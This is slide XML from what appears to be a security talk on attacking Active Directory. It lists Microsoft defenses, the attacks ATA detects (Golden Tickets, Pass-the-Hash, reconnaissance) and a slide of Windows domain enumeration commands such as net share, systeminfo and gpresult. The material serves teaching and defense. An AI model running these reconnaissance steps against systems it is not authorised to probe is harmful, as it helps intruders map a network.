              <a:t>Microsoft ATP Compiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Defender Antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Device Guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit Guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66E4C478-483B-455F-B7FE-17131CE1F735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4523269" y="1734594"/>
            <a:ext cx="7046284" cy="4755219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128979109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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393636" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Built-in Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66675" y="1529253"/>
            <a:ext cx="3431097" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft ATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{231B4F80-A1A2-4183-9D05-C7DF3C1C60C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938032" y="1701054"/>
            <a:ext cx="8718571" cy="4871195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402288976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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393636" y="28078"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393636" y="669243"/>
            <a:ext cx="9404723" cy="713064"/>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ATA Detects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5656A13-9531-43BA-9388-F2601C808E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198149" y="1385455"/>
            <a:ext cx="6507451" cy="5246254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abnormal Sensitive Group Modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken trust between computers and domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute force attack using LDAP simple bind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption downgrade activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute-Force Password Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Honeytoken activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identity theft using Pass-the-Hash attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identity theft using Pass-the-Ticket attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious Data Protection Private Information Request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious replication requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Massive object deletion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B487C7-FB58-490B-8DAB-297C16370DD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6465455" y="1382307"/>
            <a:ext cx="5726545" cy="5396349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Privilege escalation using forged authorization data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Reconnaissance using directory services queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Reconnaissance using DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Reconnaissance using SMB Session Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Remote execution attempt detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Sensitive account credentials exposed &amp; Services exposing account credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Suspicious authentication failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Suspicion of identity theft based on abnormal behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Unusual protocol implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284744709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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="136681"/>
            <a:ext cx="9404723" cy="713064"/>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Enumeration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ATP/A Detectable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E5D998-BDE1-4027-A8CC-7EEA4E937680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195077" y="2120871"/>
            <a:ext cx="4591079" cy="4054546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>userdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>logonserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>homepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>echo %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>homedrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>net share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>net accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> /svc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>gpresult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> /z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3D7E388-0F90-4AFE-AE1E-D53EBD6BF534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4884630" y="2140131"/>
            <a:ext cx="7396466" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
